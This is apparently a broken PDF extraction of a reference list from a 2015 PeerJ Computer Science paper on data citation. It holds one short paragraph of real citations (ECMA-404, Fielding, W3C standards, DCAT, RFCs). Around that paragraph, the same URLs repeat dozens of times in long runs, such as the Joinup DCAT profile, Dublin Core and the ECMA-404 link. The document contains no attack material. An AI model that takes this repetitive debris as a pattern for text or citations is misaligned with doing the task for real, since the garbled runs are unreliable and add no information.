https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://dublincore.org/documents/dces/ http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://doi.contentdirections.com/reprints/dyson_excerpt.pdf http://dx.doi.org/10.7717/peerj-cs.1 ECMA. 2013. ECMA-404: the JSON data interchange format. Available at http://www. ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf. Editors. 2010. Credit where credit is due. Nature 462(7275):825 DOI 10.1038/462825a. Fielding RT. 2000. Architectural styles and the design of network-based software architectures. Doctoral dissertation, University of California at Irvine. Available at https://www.ics.uci.edu/∼ fielding/pubs/dissertation/top.htm. Fielding RT, Taylor RN. 2002. Principled design of the modern web architecture. ACM Transactions on Internet Technology 2(2):115–150 DOI 10.1145/514183.514185. Gao S, Sperberg-McQueen CM, Thompson HS. 2012. W3C XML schema definition language (XSD) 1.1 part 1: structures: W3C recommendation 5 April 2012. Available at http://www.w3. org/TR/xmlschema11-1/. GitHub Guides. 2014. Making your code citable. Available at https://guides.github.com/activities/ citable-code/. Goodman A, Pepe A, Blocker AW, Borgman CL, Cranmer K, Crosas M, Di Stefano R, Gil Y, Groth P, Hedstrom M, Hogg DW, Kashyap V, Mahabal A, Siemiginowska A, Slavkovic A. 2014. Ten simple rules for the care and feeding of scientific data. PLoS Computational Biology 10(4):e1003542 DOI 10.1371/journal.pcbi.1003542. Gray A, Dumontier M, Marshall M, Baram J, Ansell P, Bader G, Bando A, Callahan A, Cruz-toledo J, Gombocz E, Gonzalez-Beltran A, Groth P, Haendel M, Ito M, Jupp S, Katayama T, Krishnaswami K, Lin S, Mungall C, Le Novere N, Laibe C, Juty N, Malone J, Rietveld L. 2014. Data catalog vocabulary (DCAT): W3C recommendation 16 January 2014. Available at http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/. Greenberg SA. 2009. How citation distortions create unfounded authority: analysis of a citation network. BMJ 339:b2680 DOI 10.1136/bmj.b2680. Gudgin M, Hadley M, Mendelsohn N, Moreau J-J, Nielsen HF, Karmarkar A, Lafon Y. 2007. SOAP version 1.2 part 1: messaging framework (second edition): W3C recommendation 27 April 2007. Available at http://www.w3.org/TR/soap12-part1/. Haas H, Brown A. 2004. Web services glossary: W3C working group note 11 February 2004. Available at http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice. Hakala J. 2001. RFC3188: using national bibliography numbers as uniform resource names. Available at https://tools.ietf.org/html/rfc3188. Hilse H-W, Kothe J. 2006. Implementing persistent identifiers. Available at http://xml.coverpages. org/ECPA-PersistentIdentifiers.pdf. Holtzman K, Mutz A. 1998. RFC2295: transparent content negotiation in HTTP. Available at https://www.ietf.org/rfc/rfc2295.txt. Hourclé J, Chang W, Linares F, Palanisamy G, Wilson B. 2012. Linking articles to data. In: 3rd ASIS&T Summit on Research Data Access & Preservation (RDAP) New Orleans, LA, USA. Available at http://vso1.nascom.nasa.gov/rdap/RDAP2012 landingpages handout.pdf. International DOI Foundation. 2014. DOI handbook. Available at http://www.doi.org/hb.html. Ioannidis JPA. 2005. Why most published research findings are false. PLoS Medicine 2(8):e124 DOI 10.1371/journal.pmed.0020124. ISO/TC 211. 2014. ISO 19115-1:2014: geographic information metadata, part 1: fundamentals. Available at http://www.iso.org/iso/home/store/catalogue tc/catalogue detail.htm? csnumber=53798. Jacobs I, Walsh N. 2004. Architecture of the world wide web, volume one W3C recommendation 15 December 2004. Available at http://www.w3.org/TR/webarch/#identification. Starr et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.1 20/22 https://peerj.com/computer-science/ http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf http://dx.doi.org/10.1038/462825a https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm http://dx.doi.org/10.1145/514183.514185 http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ http://www.w3.org/TR/xmlschema11-1/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ http://dx.doi.org/10.1371/journal.pcbi.1003542 http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://www.w3.org/2001/sw/hcls/notes/hcls-dataset/ http://dx.doi.org/10.1136/bmj.b2680 http://www.w3.org/TR/soap12-part1/ http://www.w3.org/TR/soap12-part1/ http://www.w3.org/TR/soap12-part1/ http://www.w3.org/TR/soap12-part1/ http://www.w3.org/TR/soap12-part1/ http://www.w3.org/TR/soap12-part1/ http://www.w3.org/TR/soap12-part1/ http://www.w3.org/TR/soap12-part1/ http://www.w3.org/TR/soap12-part1/ http://www.w3.org/TR/soap12-part1/ http://www.w3.org/TR/soap12-part1/ http://www.w3.org/TR/soap12-part1/ http://www.w3.org/TR/soap12-part1/ http://www.w3.org/TR/soap12-part1/ http://www.w3.org/TR/soap12-part1/ http://www.w3.org/TR/soap12-part1/ http://www.w3.org/TR/soap12-part1/ http://www.w3.org/TR/soap12-part1/ http://www.w3.org/TR/soap12-part1/ http://www.w3.org/TR/soap12-part1/ http://www.w3.org/TR/soap12-part1/ http://www.w3.org/TR/soap12-part1/ http://www.w3.org/TR/soap12-part1/ http://www.w3.org/TR/soap12-part1/ http://www.w3.org/TR/soap12-part1/ http://www.w3.org/TR/soap12-part1/ http://www.w3.org/TR/soap12-part1/ http://www.w3.org/TR/soap12-part1/ http://www.w3.org/TR/soap12-part1/ http://www.w3.org/TR/soap12-part1/ http://www.w3.org/TR/soap12-part1/ http://www.w3.org/TR/soap12-part1/ http://www.w3.org/TR/soap12-part1/ http://www.w3.org/TR/soap12-part1/ http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice 